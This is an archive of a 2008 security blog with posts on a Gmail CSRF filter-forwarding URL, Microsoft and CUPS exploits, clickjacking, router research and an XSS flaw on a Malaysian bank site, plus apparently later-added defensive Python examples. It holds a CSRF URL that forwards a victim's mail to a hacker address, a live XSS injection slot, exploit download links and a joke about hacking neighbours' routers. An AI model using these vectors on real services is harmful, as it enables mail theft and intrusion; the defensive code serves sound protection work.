Monday, November 24, 2008

Gmail Security Flaw PoC-CSRF ?

Geekcondition published an article, Gmail Security Flaw PoC. It is really a CSRF (Cross-Site Request Forgery) that manipulates the live Gmail session. It happens when the victim visits a malicious website while logged in to Gmail.

Brandon from Geekcondition split the URL out into its variables, which look like this.

http://mail.google.com/mail/
?ui=2
&ik=ad7df7dc23 *Unique Account Identifier*
&at=xn3j35svndkg48yp2qgmpt99ivcqdc *Session Authorization Key*
&view=up
&act=cf
&rt=h
&zx=pjo6fg-k2ljzh&search=cf
&cf1_from=support%40godaddy.com
&cf2_emc=true&cf2_email=hacker%40hacker.com
&cf2_tr=true
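The request above only works as a CSRF if the server accepts it without proof that the logged-in user, rather than a third-party page, issued it. The following is an added example (not code from the Geekcondition post or from Gmail) of the server-side checks that break that chain: refusing state changes over GET, checking the Origin/Referer header, and comparing the `at` token against the live session bound to `ik`. The session store, the allowed origin and the `csrf_verdict` function are assumptions; the URL is the one from the post, reassembled.

```python
import hmac
from urllib.parse import urlsplit, parse_qs

# Constructed sample: the filter-creation URL from the post, reassembled into one line.
FILTER_URL = (
    "http://mail.google.com/mail/?ui=2&ik=ad7df7dc23"
    "&at=xn3j35svndkg48yp2qgmpt99ivcqdc&view=up&act=cf&rt=h"
    "&zx=pjo6fg-k2ljzh&search=cf&cf1_from=support%40godaddy.com"
    "&cf2_emc=true&cf2_email=hacker%40hacker.com&cf2_tr=true"
)

# Assumed server-side session store: account identifier (ik) -> session token (at).
SESSIONS = {"ad7df7dc23": "xn3j35svndkg48yp2qgmpt99ivcqdc"}
ALLOWED_ORIGIN = "http://mail.google.com"   # assumed application origin
STATE_CHANGING_ACTS = {"cf"}                # act=cf creates a mail filter


def parse_request_url(url):
    """Flatten the query string into a dict of single (percent-decoded) values."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def csrf_verdict(method, headers, params):
    """Return (accepted, reason) for a request that may change account state."""
    if params.get("act") not in STATE_CHANGING_ACTS:
        return True, "not a state-changing action"
    # 1. A state change reachable by GET can be triggered by a link or <img> tag.
    if method != "POST":
        return False, "state change requested over GET"
    # 2. The browser-supplied Origin (or Referer) must be the application itself.
    origin = headers.get("Origin") or headers.get("Referer", "")
    if origin != ALLOWED_ORIGIN and not origin.startswith(ALLOWED_ORIGIN + "/"):
        return False, "request did not originate from the application's origin"
    # 3. The token in the request must match the session bound to this account,
    #    compared in constant time so the check itself leaks nothing.
    expected = SESSIONS.get(params.get("ik", ""))
    supplied = params.get("at", "")
    if expected is None or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "session token does not match the account's live session"
    return True, "same-origin POST carrying the session-bound token"


if __name__ == "__main__":
    params = parse_request_url(FILTER_URL)
    print(params["act"], params["cf2_email"])
    print(csrf_verdict("GET", {"Referer": "http://attacker.invalid/"}, params))
    print(csrf_verdict("POST", {"Origin": ALLOWED_ORIGIN}, params))
```

The Origin/Referer check only helps where the browser sends the header, so the session-bound token remains the primary control; the point of the example is that each of the three checks independently rejects the cross-site request shown in the post.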

Reference: http://geekcondition.com/2008/11/23/gmail-security-flaw-proof-of-concept/

Recruiter looks for job expertise in LinkedIn without paying for service?

A few of our colleagues mentioned that they keep receiving email invitations from job recruiters, sent to their company email, asking them to connect on LinkedIn. Some said it could be that company staff expose too much of their information in social networking applications (such as LinkedIn); others said staff could be selling company email contacts to others for profit.

From what I have seen, it is possibly one of the ways recruiting companies look for potential human resources without paying for the service. They keep 'spamming' corporate staff emails, asking them to connect to their LinkedIn network group. LinkedIn is one of the best platforms for serving or exposing your 'Personal Resume' to other parties. Below is a screenshot example.


Thinking from a security perspective, are you comfortable exposing your information in public? Please think twice before publishing anything about yourself on the internet. People can easily look up your information because Google is a good crawler, and LinkedIn is on its list of crawling favourites. As I always emphasise, protect yourself securely!

Sunday, November 23, 2008

PoC for MS08-069 !

As promised in the previous blog post, I am publishing the PoC related to Microsoft vulnerability MS08-069 here. The PoC details can be obtained from http://milw0rm.com/exploits/7196 and the description of MS08-069 can be obtained from Microsoft.

Thursday, November 20, 2008

Microsoft Announces Plans for No-Cost Consumer Security Offering-"Morro"

Microsoft, the giant software company, announced that it will release its security application to customers at no cost. The product is expected in the market by the second half of 2009. It looks like Microsoft is going to enter the security market entirely by introducing its product, codenamed 'Morro'.

Although Microsoft mentioned the product will come as a stand-alone application, I still doubt Microsoft's intention. The 'Morro' product could be a hard challenge to the available antivirus products. I foresee that 'Morro' will not have much impact on current security products in the Enterprise/Corporate segment within one year, due to the complexity of security architecture and design: it is too costly for enterprises and corporates to shift from their existing security products to new ones. However, the antivirus market segment, especially home products, will be impacted heavily. That is another attempt by Microsoft to monopolise home users aggressively, because it is free of charge to consumers.

Hugh... :(
Microsoft -> 'Macrosoft'

ref: http://www.microsoft.com/Presspass/press/2008/nov08/11-18NoCostSecurityPR.mspx

Wednesday, November 19, 2008

Ubuntu CUPS crash Zero-Day!

GNUCITIZEN found an Ubuntu CUPS crash zero-day; they showed a PoC of how to remotely crash the CUPS daemon on localhost:631.

The target Ubuntu systems are:

- Ubuntu 8.04.1 (LTS) Hardy and
- Ubuntu 8.10 (Intrepid)

You can read the details from GNUCITIZEN and try the PoC at http://snipurl.com/5vp46


Sunday, November 16, 2008

Anti-Phishing Game for Fun !

Anti-Phishing Phil is an online Flash game about anti-phishing; you can try to play it and learn to differentiate legitimate websites from non-legitimate ones. Through this game, users are educated to avoid falling for phishing attacks.

Requirements:
- Any browser with Flash 8 installed.
- A web browser with Flash 9 (Firefox and IE 7)

Play:
http://cups.cs.cmu.edu/antiphishing_phil/new/index.html

MS08-068 PoC exploit tool !

As promised in the previous post, the MS08-068 PoC exploit tool now exists in public.

**********************************************************************************
* SMBRELAY 3 - NTLM replay attack (version 1.0 ) public version
* (c) 2008 Andres Tarasco Acuña ( atarasco _at_ gmail.com )
* URL: http://tarasco.org/Web/tools.html

http://milw0rm.com/sploits/2008-smbrelay3.zip

# milw0rm.com [2008-11-14]

Rip entire CD-rom content to iso image

Hi, a friend asked me today for help on how to copy the entire content of a CD-ROM as an ISO image in Ubuntu. I showed him a simple command using dd; it will probably help others as well if I share the command on this blog.

$ sudo dd if=/dev/cdrom of=image.iso

How to use the content of image.iso? Mount it:

$ mkdir /tmp/mountimage
$ sudo mount -t iso9660 -oloop image.iso /tmp/mountimage

How to unmount the image when it is no longer needed?
$ sudo umount /tmp/mountimage

Thursday, November 13, 2008

New trend security threat ? Clickjacking

Clickjacking? What's that? It has become one of the hot issues in the IT security field recently; speakers make it one of their topics whenever a security conference is held. If you type the word "Clickjacking" into Google, it returns around ~700K results related to "Clickjacking".



Although this kind of threat has already been identified, browser vendors (IE, FF, Safari, Opera) still do not have any temporary solution for the moment. Similar 'jacking' techniques are onMouseUpJacking, FormJacking and SubmitJacking.

From some research on clickjacking, this technique tries to fool the user's clicking behaviour, and it returns a profit for the web owner through clicks on loaded advertisements. One characteristic of clickjacking is trying to hide the button, or make it as small and as invisible as possible. -moz-opacity, also called transparency, is used to hide images, website iframes and so on.

Example:



Some say the "NoScript" add-on available for Firefox can prevent this type of attack, but what about other browsers? According to the pie chart obtained from http://en.wikipedia.org/wiki/Usage_share_of_web_browsers, IE browsers are still dominating! The risk is still out there in the wild!

Although we have outstanding tools to prevent this kind of threat, security responsibility still depends on internet users' browsing behaviour. :(




Definition of Clickjacking can be obtained from http://en.wikipedia.org/wiki/Clickjacking
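The post is right that the defence cannot rest on the user; the site being framed has to declare that it refuses to be framed. This added example (not code from the post, nor from any browser vendor) shows how a server or a scanner evaluates a response for anti-framing controls using the X-Frame-Options header and the Content-Security-Policy frame-ancestors directive, both of which browsers adopted after this post was written. The `framing_protection` and `harden` functions and the sample header sets are my own, constructed for illustration.

```python
def _csp_frame_ancestors(csp_value):
    """Return the source list of a frame-ancestors directive, or None if absent."""
    for directive in csp_value.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]]
    return None


def framing_protection(headers):
    """Classify a response's resistance to being loaded in a hostile frame.

    Returns one of:
      'strong'      - CSP frame-ancestors 'none' or 'self' (authoritative control)
      'allow-list'  - CSP frame-ancestors names specific origins (review the list)
      'legacy-only' - only X-Frame-Options DENY/SAMEORIGIN/ALLOW-FROM is present
      'none'        - nothing stops an attacker's page from framing this response
    """
    lower = {k.lower(): v.strip() for k, v in headers.items()}
    ancestors = _csp_frame_ancestors(lower.get("content-security-policy", ""))
    if ancestors is not None:
        if ancestors in (["'none'"], ["'self'"]):
            return "strong"
        return "allow-list"
    xfo = lower.get("x-frame-options", "").upper()
    if xfo in ("DENY", "SAMEORIGIN") or xfo.startswith("ALLOW-FROM"):
        return "legacy-only"
    return "none"


def harden(headers):
    """Return a copy of the response headers with both anti-framing controls set.

    X-Frame-Options is kept for older browsers; CSP frame-ancestors takes
    precedence in browsers that understand it.
    """
    hardened = dict(headers)
    hardened["X-Frame-Options"] = "DENY"
    hardened["Content-Security-Policy"] = "frame-ancestors 'none'"
    return hardened


if __name__ == "__main__":
    # Constructed sample responses.
    unprotected = {"Content-Type": "text/html"}
    print(framing_protection(unprotected))          # none
    print(framing_protection(harden(unprotected)))  # strong
```

If the application genuinely needs to be embedded by a partner site, use the allow-list form (`frame-ancestors https://partner.example`) rather than dropping the header altogether, and treat any 'allow-list' verdict as something to review against the actual partner list.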

SOHO routers hacked

While I was searching for documentation or guides on how to 'penetrate' SOHO routers, I found that the SourceSec group did research on a few commonly used branded routers. It sounds great, and it is the research paper I was looking for. Hahhaa... my neighbourhood's 'routers' will get pained by this. :D


SUMMARY

The purpose of this paper is to outline the security measures being taken
by vendors to prevent such attacks in their home routing products, what
those security measures accomplish, and where they fall short. We will use
existing network tools to examine common vulnerabilities in a range of
popular devices and demonstrate weaknesses in the security of those
devices; additionally, we will examine common trends in security measures
that have been duplicated across vendors, and examine how those trends
help and hinder the security of their devices. In particular, we will
examine the following home routers, which are some of the latest offerings
from their respective vendors at the time of this writing:

* Linksys WRT160N
* D-Link DIR-615
* Belkin F5D8233-4v3
* ActionTec MI424-WR


Conclusion:
Router manufacturers are increasing the security of their devices,
however, home router security still has a long road ahead of it. Below is
a table listing each of the devices and their associated, reasonably
exploitable, vulnerabilities mentioned in this paper; these types of
vulnerabilities must be considered by all vendors, and should be
investigated by any consumer before purchasing a router.






Reference:http://www.sourcesec.com/Lab/soho_router_report.pdf

Tuesday, November 11, 2008

Nov 2008 - Microsoft Tuesday Patches Released

Microsoft officially released two patches for November 2008 yesterday: one critical and one important, fixing a vulnerability in XML and a vulnerability in SMB respectively. Both vulnerabilities were identified as allowing remote code execution.

1. Microsoft Security Bulletin MS08-069 (Critical)
Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (955218)

2. Microsoft Security Bulletin MS08-068 (Important)
Vulnerability in SMB Could Allow Remote Code Execution (957097)



Reference:
http://www.microsoft.com/technet/security/Bulletin/MS08-nov.mspx

What are you waiting for! Just go and update and secure your Mr. Bill's systems :)

As usual, I will publish any PoC for these vulnerabilities if one is found.

Monday, November 3, 2008

XSS in Maybank website

Maybank is one of the largest banks in Malaysia; most Malaysians use Maybank for their daily payment transactions, and 83.9% of its internet users are from Malaysia. To support this, www.maybank2u.com.my holds a traffic rank of 3082 in Alexa, or you can get the info from
Link: http://www.alexa.com/data/details/traffic_details/maybank2u.com.my

XSS code:
http://www.maybank2u.com.my/thirdparty/thirdpartyreport?url= put script here



Reference: http://security.org.my/index.php?/authors/Mel-Mudin
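The flaw above is a reflected parameter: whatever arrives in `url=` is written back into the page. The following added example (not code from the bank's site or from the referenced advisory) shows, in Python, the vulnerable pattern beside a hardened version that validates the parameter against an allow-list of hosts and HTML-escapes it before output. The host allow-list, the function names and the sample inputs are constructed for illustration.

```python
import html
from urllib.parse import urlsplit

# Assumed allow-list: the only hosts a third-party report link may point to.
ALLOWED_HOSTS = {"www.maybank2u.com.my"}
SAFE_FALLBACK = "/"  # assumed local landing page used when validation fails


def render_report_vulnerable(url):
    """The pattern the post describes: the parameter is reflected unescaped."""
    return '<a href="%s">%s</a>' % (url, url)


def is_allowed_url(url):
    """Accept only absolute http(s) URLs whose host is on the allow-list."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS


def render_report_hardened(url):
    """Validate, then escape for the HTML attribute and text contexts it lands in."""
    if not is_allowed_url(url):
        url = SAFE_FALLBACK
    # quote=True also escapes " and ', which matters inside href="..."
    safe = html.escape(url, quote=True)
    return '<a href="%s">%s</a>' % (safe, safe)


if __name__ == "__main__":
    # Constructed inputs: a markup-bearing value and a non-http scheme.
    for sample in ('"><b>x</b>', "javascript:void(0)",
                   "https://www.maybank2u.com.my/report?id=<1>"):
        print(render_report_hardened(sample))
```

Escaping alone stops the markup from executing, but the allow-list is what keeps the parameter from becoming an open redirect to a phishing site; the hardened function applies both.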